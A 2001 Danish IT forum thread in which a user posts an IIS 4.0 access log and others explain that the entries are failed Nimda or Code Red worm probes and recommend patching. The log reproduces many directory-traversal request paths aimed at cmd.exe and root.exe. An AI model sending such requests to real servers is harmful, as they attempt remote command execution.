CIO Tech Eksperten IT-JOB IT-Kurser Events Podcast Søg
Cookie ikon
Avatar billede mt1977 Nybegynder
11. december 2001 - 22:41 Der er 10 kommentarer og
2 løsninger

hacking hjælp!!!!

Hej alle

Jeg har seriøst brug for hjælp!!!!
Jeg tror der er nogle der hacker mit \"default web site\" på min iis 4.0
Jeg har kigget i min log fil til dette site og dette er hvad der står for idag:

#Software: Microsoft Internet Information Server 4.0
#Version: 1.0
#Date: 2001-12-11 01:33:22
#Fields: time c-ip cs-method cs-uri-stem sc-status
01:33:22 62.172.205.44 GET /scripts/root.exe 401
01:33:22 62.172.205.44 GET /MSADC/root.exe 401
01:33:25 62.172.205.44 GET /c/winnt/system32/cmd.exe 404
01:33:25 62.172.205.44 GET /d/winnt/system32/cmd.exe 404
01:33:29 62.172.205.44 GET /scripts/..%5c../winnt/system32/cmd.exe 401
03:55:14 62.188.213.177 GET /scripts/root.exe 401
03:55:22 62.188.213.177 GET /MSADC/root.exe 401
09:00:44 62.243.193.157 GET /scripts/root.exe 401
09:00:44 62.243.193.157 GET /MSADC/root.exe 401
09:00:44 62.243.193.157 GET /c/winnt/system32/cmd.exe 404
09:00:44 62.243.193.157 GET /d/winnt/system32/cmd.exe 404
09:00:44 62.243.193.157 GET /scripts/..%5c../winnt/system32/cmd.exe 401
09:00:45 62.243.193.157 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
09:00:45 62.243.193.157 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
09:00:45 62.243.193.157 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 401
09:00:45 62.243.193.157 GET /scripts/..Á../winnt/system32/cmd.exe 401
09:00:45 62.243.193.157 GET /scripts/winnt/system32/cmd.exe 401
09:00:45 62.243.193.157 GET /winnt/system32/cmd.exe 404
09:00:45 62.243.193.157 GET /winnt/system32/cmd.exe 404
09:00:46 62.243.193.157 GET /scripts/..%5c../winnt/system32/cmd.exe 401
09:00:46 62.243.193.157 GET /scripts/..%5c../winnt/system32/cmd.exe 401
09:00:46 62.243.193.157 GET /scripts/..%5c../winnt/system32/cmd.exe 401
09:00:46 62.243.193.157 GET /scripts/..%2f../winnt/system32/cmd.exe 401
11:49:00 192.168.1.6 OPTIONS / 200
11:49:00 192.168.1.6 PROPFIND /company 501
12:41:00 62.243.180.197 GET /scripts/root.exe 401
12:41:00 62.243.180.197 GET /MSADC/root.exe 401
12:41:02 62.243.180.197 GET /c/winnt/system32/cmd.exe 404
12:41:03 62.243.180.197 GET /d/winnt/system32/cmd.exe 404
12:41:03 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
12:41:04 62.243.180.197 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
12:41:05 62.243.180.197 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
12:41:05 62.243.180.197 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 401
12:41:07 62.243.180.197 GET /scripts/..Á../winnt/system32/cmd.exe 401
12:41:07 62.243.180.197 GET /scripts/winnt/system32/cmd.exe 401
12:41:08 62.243.180.197 GET /winnt/system32/cmd.exe 404
12:41:08 62.243.180.197 GET /winnt/system32/cmd.exe 404
12:41:08 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
12:41:10 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
12:41:10 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
12:41:11 62.243.180.197 GET /scripts/..%2f../winnt/system32/cmd.exe 401
12:42:06 62.243.180.197 GET /scripts/root.exe 401
12:42:06 62.243.180.197 GET /MSADC/root.exe 401
12:42:08 62.243.180.197 GET /c/winnt/system32/cmd.exe 404
12:42:09 62.243.180.197 GET /d/winnt/system32/cmd.exe 404
12:42:09 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
12:42:11 62.243.180.197 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
12:42:11 62.243.180.197 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
12:42:13 62.243.180.197 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 401
12:42:14 62.243.180.197 GET /scripts/..Á../winnt/system32/cmd.exe 401
12:42:14 62.243.180.197 GET /scripts/winnt/system32/cmd.exe 401
12:42:16 62.243.180.197 GET /winnt/system32/cmd.exe 404
12:42:16 62.243.180.197 GET /winnt/system32/cmd.exe 404
12:42:17 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
12:42:19 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
12:42:19 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
12:42:21 62.243.180.197 GET /scripts/..%2f../winnt/system32/cmd.exe 401
12:43:21 192.168.1.6 OPTIONS / 200
12:43:21 192.168.1.6 PROPFIND /Company 501
12:43:21 192.168.1.6 PROPFIND /mt 501
13:52:06 192.168.1.6 OPTIONS / 200
13:52:06 192.168.1.6 PROPFIND /company 501
14:09:26 192.168.1.6 OPTIONS / 200
14:09:26 192.168.1.6 PROPFIND /Company 501
14:09:26 192.168.1.6 PROPFIND /mt 501
14:26:21 192.168.1.6 OPTIONS / 200
14:26:21 192.168.1.6 PROPFIND /Company 501
14:26:21 192.168.1.6 PROPFIND /mt 501
17:38:39 62.243.180.197 GET /scripts/root.exe 401
17:38:42 62.243.180.197 GET /MSADC/root.exe 401
17:38:46 62.243.180.197 GET /c/winnt/system32/cmd.exe 404
17:38:49 62.243.180.197 GET /d/winnt/system32/cmd.exe 404
17:38:52 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
17:38:56 62.243.180.197 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
17:38:59 62.243.180.197 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
17:39:02 62.243.180.197 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 401
17:39:05 62.243.180.197 GET /scripts/..Á../winnt/system32/cmd.exe 401
17:39:08 62.243.180.197 GET /scripts/winnt/system32/cmd.exe 401
17:39:12 62.243.180.197 GET /winnt/system32/cmd.exe 404
17:39:15 62.243.180.197 GET /winnt/system32/cmd.exe 404
17:39:18 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
17:39:21 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
17:39:25 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
17:39:28 62.243.180.197 GET /scripts/..%2f../winnt/system32/cmd.exe 401
19:23:29 192.168.1.6 OPTIONS / 200
19:23:29 192.168.1.6 PROPFIND /Company 501
19:49:07 62.243.180.197 GET /scripts/root.exe 401
19:49:07 62.243.180.197 GET /MSADC/root.exe 401
19:49:07 62.243.180.197 GET /c/winnt/system32/cmd.exe 404
19:49:07 62.243.180.197 GET /d/winnt/system32/cmd.exe 404
19:49:07 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
19:49:07 62.243.180.197 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
19:49:07 62.243.180.197 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
19:49:07 62.243.180.197 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 401
19:49:08 62.243.180.197 GET /scripts/..Á../winnt/system32/cmd.exe 401
19:49:08 62.243.180.197 GET /scripts/winnt/system32/cmd.exe 401
19:49:08 62.243.180.197 GET /winnt/system32/cmd.exe 404
19:49:08 62.243.180.197 GET /winnt/system32/cmd.exe 404
19:49:08 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
19:49:08 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
19:49:08 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
19:49:08 62.243.180.197 GET /scripts/..%2f../winnt/system32/cmd.exe 401
20:10:18 62.243.180.197 GET /scripts/root.exe 401
20:10:18 62.243.180.197 GET /MSADC/root.exe 401
20:10:18 62.243.180.197 GET /c/winnt/system32/cmd.exe 404
20:10:18 62.243.180.197 GET /d/winnt/system32/cmd.exe 404
20:10:18 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
20:10:18 62.243.180.197 GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
20:10:18 62.243.180.197 GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe 500
20:10:18 62.243.180.197 GET /msadc/..%5c../..%5c../..%5c/..Á../..Á../..Á../winnt/system32/cmd.exe 401
20:10:19 62.243.180.197 GET /scripts/..Á../winnt/system32/cmd.exe 401
20:10:19 62.243.180.197 GET /scripts/winnt/system32/cmd.exe 401
20:10:19 62.243.180.197 GET /winnt/system32/cmd.exe 404
20:10:19 62.243.180.197 GET /winnt/system32/cmd.exe 404
20:10:19 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
20:10:19 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
20:10:19 62.243.180.197 GET /scripts/..%5c../winnt/system32/cmd.exe 401
20:10:19 62.243.180.197 GET /scripts/..%2f../winnt/system32/cmd.exe 401
20:16:00 192.168.1.6 OPTIONS / 200
20:16:00 192.168.1.6 PROPFIND /Company 501

Er der noget jeg har gjort forkert?? Hvad skal jeg lukke for...
HJÆLPPPPP!!!!!!!!
Avatar billede otis Nybegynder
11. december 2001 - 22:44 #1
det er jo bare en der har nimda.. eller code red.. kan ikke huske hvilken, det er jo ikke din skyld :P
Avatar billede prodic Mester
11. december 2001 - 22:45 #2
Det er ganske simpelt NIMDA der forsøger at inficere din IIS - og det sker fra de IP-numre der står foran.
Koderne bagved 401/404 viser at det ikke lykkedes for NIMDA at komme igennem. Heldigvis :-)
Avatar billede mt1977 Nybegynder
11. december 2001 - 22:45 #3
hvad betyder det for mig????
Avatar billede bojohansen Nybegynder
11. december 2001 - 22:46 #4
http://www.ripe.net/perl/whois?query=62.243.193.157&.submit=Send+foresp%F8rgsel

Det er en Teledanmark kunde, skriv til teledk (emailen finder du på linket)
Få dem til at skrive til ham og bede ham patche hans IIS server da han har fået Nimda virus (det ser sådant ud)

Send log filen med.
Avatar billede prodic Mester
11. december 2001 - 22:46 #5
Måske du lige skulle tjekke en ekstra gang, at du har opdateret med de seneste patches/Service Packs bare for en sikkerheds skyld.
Avatar billede mt1977 Nybegynder
11. december 2001 - 22:48 #6
prodic---> hvad så når der står 500 bagefter
Avatar billede prodic Mester
11. december 2001 - 22:51 #7
Det er det samme - endnu en fejlkode som du nok kender fra nettet. Det betyder også at filen ikke kunne findes(noget med en fil-forbindelse eller noget i den stil)
Avatar billede mt1977 Nybegynder
11. december 2001 - 22:52 #8
jeg har service pack 6 installeret...er det nok??
Avatar billede prodic Mester
11. december 2001 - 22:57 #9
mt1977->Det skulle jeg mene - det er ihvertfald nok til at NIMDA ikke kan komme igennem.
Men tjek for evt. mindre patches på Microsoft\'s egen side - og se om der skulle være nogle nyere. Man ved aldrig...
Avatar billede mt1977 Nybegynder
11. december 2001 - 22:58 #10
ok gutter jeg takker for hjælpen :-)
Avatar billede bojohansen Nybegynder
11. december 2001 - 23:00 #11
Fejl 500 er en \'Internal Server Error\'
Den burde have givet en Fejl \'404 file not found\' så det kunne godt tyde på at du skal læse lidt om at undgå fejl ved forespørgelse på \'cmd.exe\' (dos promt).

Min w2k Server giver 404 på denne request.
Avatar billede goulduck Nybegynder
12. december 2001 - 07:02 #12
http://www.shavlik.com/security/psa.asp

Kør lige den og installere de hotfixes, som den anbefaler!
Avatar billede Ny bruger Nybegynder

Din løsning...

Tilladte BB-code-tags: [b]fed[/b] [i]kursiv[/i] [u]understreget[/u] Web- og emailadresser omdannes automatisk til links. Der sættes "nofollow" på alle links.

Loading billede Opret Preview
Kategori
Se alle it-kurser fra Computerworld Kurser
IT-kurser om Microsoft 365, sikkerhed, personlig vækst, udvikling, digital markedsføring, grafisk design, SAP og forretningsanalyse.
Se alle it-kurser

Flere spørgsmål fra Windows kategorien

Titel Indlæg Oprettet Seneste aktivitet
Manglende plads Af Prado i Windows 10 16/07/202416:11 17/07/202406:01
Windows 11 problem!!! Af Lion i Windows 9 16/07/202415:05 18/07/202419:43
Reduseret lydstyrke i Windows Af valby i Windows 25 12/07/202419:01 16/07/202415:56
Pixeline cd’er til PC Af Mathilde i Windows 13 05/07/202414:04 16/07/202416:03
Windows 10 - IIS 10 Af bsn i Windows 2 05/07/202401:14 I dag 10:28
Se alle spørgsmål i kategorien Opret spørgsmål

Log ind eller opret profil

Hov!

For at kunne deltage på Computerworld Eksperten skal du være logget ind.

Det er heldigvis nemt at oprette en bruger: Det tager to minutter og du kan vælge at bruge enten e-mail, Facebook eller Google som login.

Opret Log ind

Du kan også logge ind via nedenstående tjenester



Alle kategorier på Eksperten
Seneste spørgsmål Seneste aktivitet
I dag 12:26 4 GB Ram er blevet væk Af Marianne Tidemann i PC
I dag 12:24 strømforsyning Af Shamanji i Andet software
I går 20:17 vlc viser kegle-icon Af casablanca i Andet software
I går 14:01 Oprette / gemme et par fotos i en mappe - Samsung Galaxy A 14 5G ? Af Ikke-ekspert i Mobiltelefoner
I går 11:14 Bærbar til Sims 3? Af idamarie i PC
White papers
Flere white papers »


Premium
Teaser billede
Tidligere Tradeshift-CEO Christian Lanng skyder tilbage efter sexslave-anklager: Deler dagbøger og private beskeder
Læs mere »
”Det største it-nedbrud i historien” lammede store dele af verden: CrowdStrike giver nu kunder en kop kaffe som undskyldning
Top-CIO Rasmus Lundgaard Pedersen balancerer hele tiden mellem to poler
5.000 flyafgange i verden blev aflyst som følge af Crowdstrike-nedbrud: Vil Københavns Lufthavn søge erstatning?
Se alle »
Computerworld
Teaser billede
Microsoft-nedbrud spreder sig: It-systemer i lufthavne verden over er ramt
Læs mere »
Test: Denne mikro-pc er smartere end de stærkeste desktop-maskiner - men flopper alligevel
Elon Musk dropper CrowdStrike efter kæmpe nedbrud
Hundredevis af flyafgange ramt af stort Microsoft-nedbrud
Se alle »
CIO
Teaser billede
Microsoft er på sagen: I gang med at løse kæmpe nedbrud efter katastrofal Crowdstrike-fejl
Læs mere »
Så mange Microsoft-enheder blev ramt af gigantisk Crowdstrike-koks
Telenor skrotter ældre it-system: Nyt system er en hyldevare
Derfor står Danske Bank foran en kæmpe AWS-transformation: Ellers skulle vi bygge en ny infrastruktur for at følge med
Se alle »
Job & Karriere
Teaser billede
Efter 12 år er NNIT's hovedkvarter i Søborg nu ryddet og tomt - alle arbejder hjemme: "Det er med et vist vemod"
Læs mere »
Norlys skal splittes op i fem selskaber: Nu bliver flere ansatte og ledere fyret
Dansk top-profil trækker sig fra Microsoft: Skal være direktør i TDC Erhverv
KMD-direktør forlader selskabet: Det skal hun nu
Se alle »
White paper
Teaser billede
Rapport kortlægger de 13 bedste muligheder for at sætte turbo på din cloud computing
Læs mere »
Unbreakable - sådan sikrer du dig vedvarende og uafbrudt adgang til dine data
Nemmere overblik, styring og omkostningskontrol i dit multicloud-miljø
Samlet platform sikrer sammenhæng, kontrol og sikkerhed i hybrid cloud
Se alle »

Events
Flere events »
White papers
Flere white papers »
IT-Kurser
Se alle vores it-kurser »